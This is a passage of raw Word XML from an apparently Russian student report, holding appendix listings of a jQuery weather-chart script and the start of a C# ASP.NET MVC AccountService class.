    <w:p w14:paraId="16E78328" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9F51C6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D10F444" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                        name: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>направление</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>град</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77BEA6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                        data: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartWindDirData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02D9E05E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B812593" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B77C9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F1C7C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487478F1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750A2B9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chart.updateOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F5FA3"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084AE2E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    categories: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartLabels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D1AFCDF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63A88A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                series: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D459273" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FF0DD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                        data: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>chartData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B9812C6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3414EA28" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2167CB29" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">                            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E9BA70" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A22CAA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72981E4B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF0759" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>OnError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3159D4F3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4B2C2B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA48D0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF80936" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0886388F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2034748F"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TW]").change(() =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>updateChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>Twind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176844AE"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PW]").change(() =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>updateChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>Pwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F7991"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TS]").change(() =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>updateChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>Tpov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5087658C"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PC]").change(() =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>updateChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>WindSpeed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F9CB3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3B6E00" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    $(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>".main</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>header__calendar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>").on("change", function () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7A9ED"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Twind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3EBE37"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Pwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E142B02"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Tpov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2BC34"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WindSpeed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BACD83" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B0463" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28943617" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00BD3B49" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">    $(document</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>).ready</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBC7F3"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Twind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6862ACF0"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Pwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91501A"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Tpov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD3B49">
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAB1E9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3B49">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>renderChart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WindSpeed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4827E3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00BD3B49">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F0D0E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514808A" w14:textId="213021DE" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc161568224"/>
      <w:bookmarkStart w:id="56" w:name="_Toc162709249"/>
      <w:r>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC2EBA">
        <w:t>Б</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AccountService</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="0E941FA7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>NuGet.ContentModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638F0443"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erverMVC.Infrastructure.Enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A359D5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ServerMVC.Models</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B9EB8A"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ystem.Security.Claims</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188DD897" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ServerMVC.Infrastructure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BAD477"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erverMVC.Models.Repository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E758C84" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>Microsoft.EntityFrameworkCore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C9DBF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395C9F39" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ServerMVC.Infrastructure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31552AB2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53B21A"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class</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="2B91AF"/>
        </w:rPr>
        <w:t>AccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>IAccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44E45534" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A589DB"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rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>readonly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>IBaseRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&lt;User&gt; _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>userRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6417F"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rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>readonly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>ILogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>AccountService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E7943">
        <w:t>&gt; _logger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B5BAF" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A692B67" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="000E7943" w:rsidRDefault="0093378B" w:rsidP="000E7943">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7943">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E7943">
        <w:rPr>
          <w:color w:val="2B91AF"/>
        </w:rPr>
